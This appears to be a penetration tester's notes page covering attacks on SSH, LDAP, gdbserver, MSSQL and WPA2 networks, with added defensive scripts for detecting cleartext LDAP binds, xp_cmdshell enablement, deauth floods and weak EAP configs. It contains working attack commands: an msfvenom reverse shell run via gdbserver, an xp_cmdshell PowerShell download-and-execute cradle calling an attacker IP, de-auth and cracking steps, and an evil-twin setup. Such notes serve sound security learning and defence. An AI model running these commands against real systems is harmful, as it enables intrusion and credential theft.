skywhi@dreamland:/var/log$ _


Network stuff

Common Protocols

SSH - port 22

Check SSH configuration

Bruteforcing credentials

Use metasploit's auxiliary/scanner/ssh/ssh_login or CrackMapExec.

Bypass login shell

To bypass restrictive login shells such as /usr/bin/nologin or /usr/bin/false, you can supply your own command when connecting over SSH; it is executed before the user drops into the assigned login shell. /bin/sh is always a good candidate.

ssh user@target /bin/sh

libssh authentication bypass

Use the python script from exploit-db.com or metasploit's auxiliary/scanner/ssh/libssh_auth_bypass to exploit an authentication bypass present in libssh before versions 0.7.6 and 0.8.4 (CVE-2018-10933).

Debian OpenSSL Predictable PRNG (CVE-2008-0166)

At some point in 2008, Debian shipped a buggy OpenSSL implementation. This bug biased the seeds used by OpenSSL's PRNG, leaving only 32,767 possible seeds for a given architecture, key size and key type.

g0tm1lk generated the possible keys, which can then be exploited with this python script.

Tools & resources

Utilities:

  • sshuttle: proxy allthethings over ssh.

Configuration guides:

SSL/TLS

Check SSL/TLS configuration

LDAP

Enumeration

Hacktricks on LDAP.

nmap --script="ldap* and not brute" 10.10.10.1 | tee detailed_ldap.txt | grep Context
ldapsearch -x -H ldap://10.10.10.1 -D '' -w '' -b "DC=abc,DC=xyz" | tee ldapsearch.txt

LDAP Pass-Back Attack

This attack relies on tricking a device into connecting to a rogue LDAP server operated by the attacker. The server is configured so that only plaintext credentials are accepted, hence capturing the credentials of the connecting service.

The setup for the attack is described here. Below are the steps for ArchLinux (make sure to check out Arch's wiki entry for OpenLDAP in parallel).
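Both of the points above come down to one server-side question: which clients bind with a cleartext simple bind (or anonymously, as the ldapsearch one-liner in the enumeration section does)? Those are the accounts a pass-back would harvest and the directories that can be enumerated without credentials. The following is an added example, not part of the original page or of OpenLDAP: it audits slapd "stats"-level log lines, tracking TLS per connection from the ACCEPT port and the "TLS established" line, and flags simple binds made without TLS as well as empty-DN binds. The log lines are constructed in that format; the DNs, hosts and IPs are placeholders.

```python
"""Audit slapd stats log lines for cleartext and anonymous simple binds.

Added example (not from the original page). Feed real slapd log lines or
journal output to audit_binds(); SAMPLE_LOG is constructed test data.
"""
import re

# Constructed sample: three client connections to one OpenLDAP server.
SAMPLE_LOG = """\
Jan 10 12:00:00 ldap1 slapd[1234]: conn=1001 fd=16 ACCEPT from IP=10.10.10.50:49152 (IP=0.0.0.0:389)
Jan 10 12:00:00 ldap1 slapd[1234]: conn=1001 op=0 BIND dn="cn=printer,dc=abc,dc=xyz" method=128
Jan 10 12:00:00 ldap1 slapd[1234]: conn=1001 op=0 RESULT tag=97 err=0 text=
Jan 10 12:00:05 ldap1 slapd[1234]: conn=1002 fd=17 ACCEPT from IP=10.10.10.60:49153 (IP=0.0.0.0:389)
Jan 10 12:00:05 ldap1 slapd[1234]: conn=1002 op=0 STARTTLS
Jan 10 12:00:05 ldap1 slapd[1234]: conn=1002 op=0 RESULT oid= err=0 text=
Jan 10 12:00:05 ldap1 slapd[1234]: conn=1002 fd=17 TLS established tls_ssf=256 ssf=256
Jan 10 12:00:05 ldap1 slapd[1234]: conn=1002 op=1 BIND dn="cn=app,dc=abc,dc=xyz" method=128
Jan 10 12:00:05 ldap1 slapd[1234]: conn=1002 op=1 RESULT tag=97 err=0 text=
Jan 10 12:00:09 ldap1 slapd[1234]: conn=1003 fd=18 ACCEPT from IP=10.10.10.1:49154 (IP=0.0.0.0:389)
Jan 10 12:00:09 ldap1 slapd[1234]: conn=1003 op=0 BIND dn="" method=128
Jan 10 12:00:09 ldap1 slapd[1234]: conn=1003 op=0 RESULT tag=97 err=0 text=
Jan 10 12:00:09 ldap1 slapd[1234]: conn=1003 op=1 SRCH base="DC=abc,DC=xyz" scope=2 deref=0 filter="(objectClass=*)"
"""

ACCEPT_RE = re.compile(r"conn=(\d+) fd=\d+ ACCEPT from IP=([\d.]+):\d+ \(IP=[\d.]+:(\d+)\)")
TLS_RE = re.compile(r"conn=(\d+) fd=\d+ TLS established")
BIND_RE = re.compile(r'conn=(\d+) op=\d+ BIND dn="([^"]*)" method=(\d+)')
LDAP_AUTH_SIMPLE = 128   # method value slapd logs for a simple (password) bind


def audit_binds(log_text):
    """Return one finding per risky bind: a simple bind on a connection that never
    negotiated TLS (password crossed the wire in the clear), or an anonymous bind."""
    conns = {}       # conn id -> {"client": ip, "tls": bool}
    findings = []
    for line in log_text.splitlines():
        m = ACCEPT_RE.search(line)
        if m:
            conn, client, port = m.groups()
            # ldaps (636) is TLS from the first byte; ldap (389) only after STARTTLS
            conns[conn] = {"client": client, "tls": port == "636"}
            continue
        m = TLS_RE.search(line)
        if m:
            conns.setdefault(m.group(1), {"client": "?", "tls": False})["tls"] = True
            continue
        m = BIND_RE.search(line)
        if m and int(m.group(3)) == LDAP_AUTH_SIMPLE:
            conn, dn = m.group(1), m.group(2)
            info = conns.get(conn, {"client": "?", "tls": False})
            if dn == "":
                findings.append({"conn": conn, "client": info["client"], "dn": dn,
                                 "issue": "anonymous simple bind"})
            elif not info["tls"]:
                findings.append({"conn": conn, "client": info["client"], "dn": dn,
                                 "issue": "simple bind with password sent in cleartext"})
    return findings


if __name__ == "__main__":
    for f in audit_binds(SAMPLE_LOG):
        print(f"conn={f['conn']} client={f['client']} dn={f['dn']!r}: {f['issue']}")
```

A printer or appliance that shows up here as a cleartext binder is exactly the kind of device the pass-back trick targets; the fix on the server side is to require TLS for simple binds (or to refuse them on port 389) and to disable anonymous binds unless enumeration is intended.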


GDB server

It is possible to obtain remote command execution when a gdb remote debugging server (gdbserver) is listening. There are several exploits available, but this can also be achieved manually: transfer an executable onto the target, reverse shells are juicy candidates, and ask gdb to debug it.

# build the executable that gdbserver will run
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf -o evil
gdb
# connect to the listening gdbserver
gdb$ target extended-remote <target>:<port>
# upload the file and make it the program to debug
gdb$ remote put evil evil
gdb$ set remote exec-file evil
gdb$ run

DNS rebinding

  • rbndr.us rebinding service.

Crack P12 (PKCS12) certificate passwords

Microsoft SQL Server (MSSQL)

Once authenticated with impacket's mssqlclient.py, fetch and execute a reverse shell through xp_cmdshell.

mssqlclient.py sa:poiuytrewq@10.11.1.31
SQL> xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString(\"http://192.168.119.184:8088/hey.ps1\")"
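xp_cmdshell is disabled by default, so the command above only works on a server where somebody turned it on, and SQL Server records every such sp_configure change in its ERRORLOG. The following is an added example, not part of the original page or of impacket: it scans ERRORLOG lines for watched server options being switched on or off. The sample lines are constructed in the ERRORLOG format; the spid and client address are placeholders.

```python
"""Flag enablement of dangerous SQL Server options in the ERRORLOG.

Added example (not from the original page). Run scan_errorlog() over the
real ERRORLOG text; SAMPLE_ERRORLOG below is constructed test data.
"""
import re

# Server options whose activation a defender wants to hear about.
WATCHED_OPTIONS = {
    "xp_cmdshell",
    "Ole Automation Procedures",
    "clr enabled",
    "Ad Hoc Distributed Queries",
}

# ERRORLOG line: <date> <time> <source> Configuration option '<opt>' changed from <old> to <new>.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<src>\S+)\s+"
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Constructed sample: 'show advanced options' is a prerequisite, then xp_cmdshell is
# enabled, used, and switched back off a few seconds later.
SAMPLE_ERRORLOG = """\
2024-01-10 12:00:01.23 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-10 12:00:01.24 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-10 12:00:04.10 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2024-01-10 12:05:00.00 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.11.1.9]
"""


def scan_errorlog(text):
    """Return one event per change to a watched option, in log order.
    Disable events are kept too: a short enable/use/disable window is the
    pattern to look for, not a permanently enabled option."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group("opt") not in WATCHED_OPTIONS:
            continue
        events.append({
            "time": m.group("ts"),
            "source": m.group("src"),      # spid of the session that ran sp_configure
            "option": m.group("opt"),
            "enabled": m.group("new") != "0",
        })
    return events


if __name__ == "__main__":
    for ev in scan_errorlog(SAMPLE_ERRORLOG):
        state = "ENABLED" if ev["enabled"] else "disabled"
        print(f"{ev['time']} {ev['source']}: {ev['option']} {state}")
```

The spid in each event can be joined against login auditing to see which account flipped the option. Turning it back off is `EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;`, which writes the same kind of line, so the scanner sees the whole window.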

Wireless

Recon

Turn an interface into monitor mode and start sniffing for networks in range.

# list available interfaces
airmon-ng
ip a
# set interface to monitor mode (creates <interface>mon)
airmon-ng start <interface>
# capture everything in range; airodump-ng writes all_traffic-01.cap plus csv/kismet summaries
airodump-ng -w all_traffic <interface>mon
# or capture raw frames into app_traffic.pcap with tcpdump
tcpdump -i <interface>mon -w app_traffic.pcap

WPA2-PSK capturing and cracking

  1. Select a target network and wait for the capture of WPA2 handshakes.
  2. If needed, actively de-auth clients to capture handshakes upon their reconnection.
  3. Use aircrack-ng / john / hashcat to crack the WPA2 master key from the handshakes.

# Sniff <bssid> on a single <channel> and store into <target>.pcap
airodump-ng -c <channel> --bssid <bssid> -w <target> <interface>mon

# De-auth up to <nb> stations to capture auth packets for good
aireplay-ng -0 <nb> -a <target bssid> <interface>mon

# Taxi, crack that key!
aircrack-ng -a 2 -w /path/to/dictionary.txt target.pcap
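The de-auth step in the list above is also the noisiest part of the procedure: a burst of deauthentication frames, usually addressed to the broadcast MAC and carrying the access point's BSSID, is easy to spot in a capture. The following is an added example, not part of the original page or of the aircrack-ng suite: a minimal 802.11 management-frame parser plus a sliding-window detector that flags a BSSID when too many deauths land inside a one-second span. It works on raw 802.11 frames (pcap and radiotap headers already stripped); the frames are constructed in memory so the script runs offline, and the MAC addresses are placeholders.

```python
"""Detect deauthentication floods in captured 802.11 management frames.

Added example (not from the original page). frames are (timestamp, raw
802.11 frame) pairs; sample_capture() builds constructed test data.
"""
import struct
from collections import defaultdict

MGMT_TYPE = 0            # frame control type 00 = management
DEAUTH_SUBTYPE = 12      # management subtype 1100 = deauthentication
BEACON_SUBTYPE = 8
BROADCAST = "ff:ff:ff:ff:ff:ff"


def _mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def _mac_bytes(text):
    return bytes(int(x, 16) for x in text.split(":"))


def parse_deauth(frame):
    """Return {dst, src, bssid, reason} for a deauth frame, else None.

    Management header: frame control (2) | duration (2) | addr1 (6) |
    addr2 (6) | addr3 (6) | sequence control (2); deauth body: reason code (2, LE).
    """
    if len(frame) < 26:
        return None
    ftype = (frame[0] >> 2) & 0b11
    subtype = (frame[0] >> 4) & 0b1111
    if ftype != MGMT_TYPE or subtype != DEAUTH_SUBTYPE:
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return {"dst": _mac(frame[4:10]), "src": _mac(frame[10:16]),
            "bssid": _mac(frame[16:22]), "reason": reason}


def build_mgmt(subtype, dst, src, bssid, body=b""):
    """Build a management frame with the header layout above (test data only)."""
    fc = bytes([(subtype << 4) | (MGMT_TYPE << 2), 0x00])
    return (fc + b"\x00\x00" + _mac_bytes(dst) + _mac_bytes(src)
            + _mac_bytes(bssid) + b"\x00\x00" + body)


def detect_deauth_floods(frames, window=1.0, threshold=5):
    """Flag a BSSID when more than `threshold` deauths fall inside any
    `window`-second span. Broadcast deauths are counted separately: an AP
    kicking every client at once is the signature of a mass de-auth."""
    stamps, broadcast, reasons = defaultdict(list), defaultdict(int), defaultdict(set)
    for ts, raw in frames:
        d = parse_deauth(raw)
        if d is None:
            continue
        stamps[d["bssid"]].append(ts)
        reasons[d["bssid"]].add(d["reason"])
        if d["dst"] == BROADCAST:
            broadcast[d["bssid"]] += 1
    alerts = []
    for bssid, times in stamps.items():
        times.sort()
        peak = start = 0
        for end in range(len(times)):            # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            alerts.append({"bssid": bssid, "peak_per_window": peak,
                           "broadcast": broadcast[bssid], "reasons": sorted(reasons[bssid])})
    return alerts


def sample_capture():
    """Constructed capture: a beacon, one ordinary deauth to a single client,
    then a 20-frame broadcast deauth burst carrying the AP's BSSID."""
    ap, client = "01:02:03:aa:bb:cc", "de:ad:be:ef:00:01"   # placeholders
    t0 = 1700000000.0
    frames = [(t0, build_mgmt(BEACON_SUBTYPE, BROADCAST, ap, ap)),
              (t0 + 0.5, build_mgmt(DEAUTH_SUBTYPE, client, ap, ap, struct.pack("<H", 3)))]
    frames += [(t0 + 2.0 + i * 0.05,
                build_mgmt(DEAUTH_SUBTYPE, BROADCAST, ap, ap, struct.pack("<H", 7)))
               for i in range(20)]
    return frames


if __name__ == "__main__":
    for alert in detect_deauth_floods(sample_capture()):
        print(alert)
```

The threshold is deliberately low; a single deauth per client per minute is normal roaming behaviour, twenty broadcast deauths in a second is not. Enabling 802.11w (protected management frames) on the access point is the configuration change that makes forged deauths fail in the first place.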

Attacking WPA2-MGT with Evil Twin

It requires two wireless interfaces: one connected to the internet or to the target network, and another, ideally powerful, interface that will serve as an access point. eaphammer can be used to generate a certificate and then run a fake WPA2-MGMT access point replicating the target's ESSID and BSSID. The attacker gets complete control over the traffic of every client that connects to the rogue access point without validating its certificate against a trusted one.

$ eaphammer --cert-wizard
$ eaphammer -i wlan0 -I wlan1 --essid "Target" --bssid 01:02:03:aa:bb:cc
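The last sentence above is the whole defence: a client that checks the RADIUS server's certificate against a pinned CA and an expected server name will refuse the evil twin no matter how well its ESSID and BSSID match. The following is an added example, not part of the original page or of eaphammer or wpa_supplicant: it parses the network={} blocks of a wpa_supplicant.conf and reports WPA-EAP networks that lack a trusted CA or a server-name match. The weak and hardened configurations are constructed; the CA file path and RADIUS hostname are placeholders.

```python
"""Audit wpa_supplicant.conf EAP networks for missing server-certificate checks.

Added example (not from the original page). Pass the real config text to
audit_eap_networks(); WEAK_CONF and HARDENED_CONF are constructed samples.
"""

# Weak (constructed): authenticates to any AP that presents some certificate.
WEAK_CONF = """
network={
    ssid="Target"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
"""

# Hardened (constructed): pin the issuing CA and the name in the server certificate.
HARDENED_CONF = """
network={
    ssid="Target"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="hunter2"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"   # placeholder path
    domain_match="radius.corp.example"            # placeholder server name
}
"""

TRUST_KEYS = ("ca_cert", "ca_path")
NAME_KEYS = ("domain_match", "domain_suffix_match", "altsubject_match", "subject_match")


def parse_networks(conf_text):
    """Return one dict per network={ ... } block, with comments and quotes stripped."""
    networks, current = [], None
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line == "network={":
            current = {}
        elif line == "}" and current is not None:
            networks.append(current)
            current = None
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)       # phase2="auth=MSCHAPV2" keeps its inner '='
            current[key.strip()] = value.strip().strip('"')
    return networks


def audit_eap_networks(conf_text):
    """Return {ssid: [issues]} for every WPA-EAP network in the config."""
    report = {}
    for net in parse_networks(conf_text):
        if "WPA-EAP" not in net.get("key_mgmt", "").split():
            continue
        issues = []
        if not any(k in net for k in TRUST_KEYS):
            issues.append("no ca_cert/ca_path: the server certificate is not verified")
        if not any(k in net for k in NAME_KEYS):
            issues.append("no domain_match (or equivalent): any certificate from the trusted CA is accepted")
        report[net.get("ssid", "?")] = issues
    return report


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        for ssid, issues in audit_eap_networks(conf).items():
            print(f"[{label}] {ssid}: {issues or 'OK'}")
```

The second check matters even with a CA configured: a public CA will happily issue a certificate to anyone for their own hostname, so without a name match the client still cannot tell the real RADIUS server from another certificate signed by the same CA.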

Port forwarding and reverse shells

Chisel

chisel is another networking swiss army knife (get precompiled binaries from the release page).

# On local machine: listen on 7777 and accept reverse tunnels from clients
./chisel server -p 7777 --reverse
# On remote: R:5985:10.10.3.4:5985 opens port 5985 on the chisel server (local machine)
# and forwards it, through this client, to 10.10.3.4:5985 on the remote network
./chisel client 10.10.1.2:7777 R:5985:10.10.3.4:5985

Socat cheatsheet

You can retrieve compiled executables for socat from the wonderful static-binaries project: linux x86_64

First, check out cheat.sh/socat for cool usage tips. Below are the ones I use the most.

